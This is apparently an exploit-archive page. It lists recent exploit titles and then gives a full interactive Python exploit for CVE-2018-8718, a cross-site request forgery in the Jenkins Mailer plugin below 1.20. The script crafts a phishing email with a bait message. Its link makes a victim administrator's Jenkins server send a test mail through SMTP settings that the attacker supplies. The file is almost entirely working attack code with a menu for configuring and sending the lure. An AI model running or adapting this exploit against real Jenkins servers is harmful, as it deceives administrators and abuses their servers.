ad4b4f15f3
11 changes to exploits/shellcodes Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit) Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit) Clone2GO Video converter 2.8.2 - Buffer Overflow 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH) 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH) 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH) WebKitGTK+ < 2.21.3 - Crash (PoC) WebKit - not_number defineProperties UAF (Metasploit) EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting Pagekit < 1.0.13 - Cross-Site Scripting Code Generator Brother HL Series Printers 1.15 - Cross-Site Scripting Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)
219 lines
No EOL
7 KiB
Python
Executable file
219 lines
No EOL
7 KiB
Python
Executable file
# Exploit Title : Jenkins mailer plugin < 1.20 - Cross-Site Request Forgery
|
|
# Date : 2018-06-05
|
|
# Exploit Author : Kl3_GMjq6
|
|
# Vendor Homepage : https://jenkins.io/
|
|
# Software Link : [https://updates.jenkins.io/download/plugins/mailer/1.20/mailer.hpi]
|
|
# Version: [Below Version 1.20 (1.1 ~ 1.20) ]
|
|
# Ref: https://jenkins.io/security/advisory/2018-03-26/#SECURITY-774
|
|
# Tested on : Linux , Windows
|
|
# CVE : CVE-2018-8718
|
|
|
|
import email.message
|
|
import smtplib
|
|
import getpass
|
|
|
|
payload_list = ['url','subject','cover_message','sender','reciver','test_email','smtp_server','l_id','l_pw']
|
|
table = {}
|
|
for i in payload_list :
|
|
table.update({i:''})
|
|
|
|
def send_mail() :
|
|
msg = email.message.Message()
|
|
msg['Subject'] = table['subject']
|
|
msg['From'] = table['sender']
|
|
msg['To'] = table['reciver']
|
|
msg.add_header('Content-Type','text/html')
|
|
msg.set_payload('<a href="'+table['url']+'\
|
|
/descriptorByName/hudson.tasks.Mailer/sendTestMail?\
|
|
charset=UTF-8&sendTestMailTo='+table['test_email']+'&adminAddress='+table['reciver']+'\
|
|
&smtpPort=465&smtpServer='+table['smtp_server']+'&smtpAuthPasswordSecret='+table['l_pw']+'\
|
|
&useSMTPAuth=true&useSsl=true&smtpAuthUserName='+table['l_id']+'">\
|
|
'+table['cover_message']+'</a>')
|
|
s = smtplib.SMTP(table['smtp_server'])
|
|
s.starttls()
|
|
s.login(table['l_id'],
|
|
table['l_pw'])
|
|
s.sendmail(msg['From'], [msg['To']], msg.as_string())
|
|
|
|
def url_set() :
|
|
url = str(input("Jenkins Server's URL(ex : http://vuln.jenkins.com) : "))
|
|
if len(url) <= 0 :
|
|
print (" Can't Be Null!")
|
|
url_set()
|
|
elif url[0:4] != "http" :
|
|
print (" URL must start with 'http://' ")
|
|
url_set()
|
|
else : table['url'] = url
|
|
|
|
def subject_set() :
|
|
subject = str(input ("SUBJECT [Default : Look! Warning with your Jenkins] : "))
|
|
if len(subject) <= 0 :
|
|
subject = "Look! Waning with your Jenkins"
|
|
table['subject'] = subject
|
|
|
|
def cover_message() :
|
|
cover_message = str(input ("Cover Message [Default : Here is your Vulnable!] : "))
|
|
if len(cover_message) <= 0 :
|
|
cover_message = "Here is your Vulnable!"
|
|
table['cover_message'] = cover_message
|
|
|
|
def sender() :
|
|
sender = str(input ("Attacker E-mail(ex : attacker@abcd.com) : "))
|
|
if len(sender) <= 0 :
|
|
print (" Can't Be Null!")
|
|
sender()
|
|
else : table['sender'] = sender
|
|
|
|
def reciver() :
|
|
reciver = str(input ("Admin's E-mail(ex : admin@abcd.com) : "))
|
|
if len(reciver) <= 0 :
|
|
print (" Can't Be Null!")
|
|
reciver()
|
|
else : table['reciver'] = reciver
|
|
|
|
def test_email() :
|
|
test_email = str(input ("Tester E-mail(ex : tester@abcd.com) : "))
|
|
if len(test_email) <= 0 :
|
|
print (" Can't Be Null!")
|
|
test_email()
|
|
table['test_email'] = test_email
|
|
|
|
def smtp_server() :
|
|
smtp_server = str(input ("SMTP_Server [Default : smtp.gmail.com] : "))
|
|
if len(smtp_server) <= 0 :
|
|
smtp_server = "smtp.gmail.com"
|
|
table['smtp_server'] = smtp_server
|
|
|
|
def l_id() :
|
|
l_id = str(input ("Your SMTP_Server ID : "))
|
|
if len(l_id) <= 0 :
|
|
print (" Can't Be Null!")
|
|
l_id()
|
|
table['l_id'] = l_id
|
|
|
|
def l_pw() :
|
|
l_pw = str(getpass.getpass("Your SMTP_Server PW : "))
|
|
if len(l_pw) <= 0 :
|
|
print (" Can't Be Null!")
|
|
l_pw()
|
|
table['l_pw'] = l_pw
|
|
|
|
def set_all () :
|
|
url_set()
|
|
subject_set()
|
|
cover_message()
|
|
sender()
|
|
reciver()
|
|
test_email()
|
|
smtp_server()
|
|
l_id()
|
|
l_pw()
|
|
print ("Setting Complit! Use 'show' to check options")
|
|
|
|
set_help = {
|
|
'all':"Set all payload",
|
|
'help':"Show set commend's help",
|
|
'url_set':"Set only 'url_set' payload",
|
|
'subject_set':"Set only 'url_set' payload",
|
|
'cover_message':"Set only 'cover_message' payload",
|
|
'sender':"Set only 'sender' payload",
|
|
'reciver':"Set only 'reciver' payload",
|
|
'test_email':"Set only 'test_email' payload",
|
|
'smtp_server':"Set only 'smtp_server' payload",
|
|
'l_id':"Set only 'l_id' payload",
|
|
'l_pw':"Set only 'l_pw' payload",
|
|
}
|
|
|
|
def set_select (a) :
|
|
if a=="all" : set_all()
|
|
elif a=="url_set" : url_set()
|
|
elif a=="subject_set" : subject_set()
|
|
elif a=="cover_message" : cover_message()
|
|
elif a=="sender" : sender()
|
|
elif a=="reciver" : reciver()
|
|
elif a=="test_email" : test_email()
|
|
elif a=="smtp_server" : smtp_server()
|
|
elif a=="l_id" : l_id()
|
|
elif a=="l_pw" : l_pw()
|
|
elif a=="help" :
|
|
for i in set_help :
|
|
print (" -%-20s %-s" %(i,set_help[i]))
|
|
print ('')
|
|
|
|
|
|
|
|
while True :
|
|
direct = str(input ("CVE-2018-8718 >> ")).lower()
|
|
|
|
if direct == "help" :
|
|
print ("""\
|
|
%-10s Show this help menu.
|
|
%-10s [-all / -help / -url_set / -subject_set / .... ]
|
|
%-10s Set the Payload
|
|
%-10s [-all] Show Current Setting.
|
|
%-10s Send CSRF use current setting.
|
|
""" %("help","set","","show","send"))
|
|
|
|
elif direct[0:3] == "set" :
|
|
if ' -' not in direct :
|
|
if direct == "set" :
|
|
set_option = ["help"]
|
|
else :
|
|
print (" Option error \n")
|
|
else :
|
|
set_option = direct.split(' -')[1:]
|
|
okay = 1
|
|
|
|
if len(set_option) == 1 :
|
|
if set_option[0] not in set_help :
|
|
print (" Option error \n")
|
|
else :
|
|
set_select(set_option[0])
|
|
elif len(set_option) >= 2 :
|
|
for i in set_option :
|
|
if i in ['help', 'all'] :
|
|
print (" *Option [-help / -all] cannot be use with another options \n")
|
|
okay = 0
|
|
break
|
|
for i in set_option :
|
|
if i not in set_help :
|
|
print (" Option error \n")
|
|
okay = 0
|
|
break
|
|
if okay == 1 :
|
|
for i in set_option :
|
|
set_select(i)
|
|
|
|
elif direct[:4] == "show" :
|
|
if " -" not in direct :
|
|
|
|
if direct == "show" :
|
|
for i in table :
|
|
if i != "l_pw" :
|
|
print (" %-20s %s" %(i,table[i]))
|
|
print (" If you want to see l_pw... add [-all] option")
|
|
print ("")
|
|
else :
|
|
print (" Option error \n")
|
|
else :
|
|
show_option = direct.split(" -")[1:]
|
|
if (len(show_option) == 1 and show_option[0] == 'all') :
|
|
for i in table :
|
|
print (" %-20s %s" %(i,table[i]))
|
|
print ()
|
|
else :
|
|
print (" Option error \n")
|
|
|
|
elif direct == "send" :
|
|
print (" Sending CSRF Mail.....")
|
|
try :
|
|
send_mail()
|
|
print (" Succed!!\n")
|
|
except :
|
|
print (" Fail....")
|
|
|
|
elif direct == "exit" :
|
|
break
|
|
|
|
else :
|
|
print (" Usage : help\n") |